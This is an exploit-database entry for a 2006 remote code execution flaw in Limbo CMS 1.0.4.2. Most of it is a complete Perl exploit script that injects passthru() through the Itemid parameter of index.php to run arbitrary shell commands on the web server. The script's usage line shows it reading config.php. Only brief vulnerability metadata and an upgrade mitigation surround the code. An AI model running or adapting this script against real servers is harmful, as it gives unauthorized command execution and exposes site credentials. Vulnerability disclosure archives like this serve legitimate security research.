header-logo
Suggest Exploit
vendor:
Limbo CMS
by:
Coloss / Epsilon and /str0ke
9,3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Limbo CMS
Affected Version From: 1.0.4.2
Affected Version To: 1.0.4.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit

Limbo CMS version 1.0.4.2 and prior are vulnerable to a remote code execution vulnerability. The vulnerability is due to the application not properly sanitizing user-supplied input passed via the 'ItemID' parameter to the 'index.php' script. This can be exploited to execute arbitrary commands on the affected system with the privileges of the webserver process.

Mitigation:

Upgrade to the latest version of Limbo CMS
Source

Exploit-DB raw data:

#!/usr/bin/perl
##
## Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit
## Bug Discovered by: Coloss / Epsilon (advance1[at]gmail.com) http://coded.altervista.org/limbophp.pl
## /str0ke (milw0rm.com)

use LWP::Simple;

$serv     =  $ARGV[0];
$path     =  $ARGV[1];
$command  =  $ARGV[2];
$cmd      =  "echo start_er;".
             "$command;".
             "echo end_er";

my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

sub usage
{
        print "Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit /str0ke (milw0rm.com)";
        print "Usage: $0 www.example.com /directory/ \"cat config.php\"\n";
        print "sever    -  URL\n";
        print "path     -  path to limbo\n";
        print "command  -  command to execute\n";
        exit ();
}

sub exploit
{
        print qq(Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit\n/str0ke (milw0rm.com)\n\n);
        $URL = sprintf("http://%s%sindex.php?option=frontpage&Itemid=passthru($byte)",$serv,$path);
        my $content = get "$URL";
        if ($content =~ m/start_er(.*?)end_er/ms) {
                my $out = $1;
                $out =~ s/^\s+|\s+$//gs;
                if ($out) {
                        print "$out\n";
                }
        }
}

if (@ARGV != 3){&usage;}else{&exploit;}

# milw0rm.com [2006-03-01]

Navigation

Suggest Exploit

Services By CQR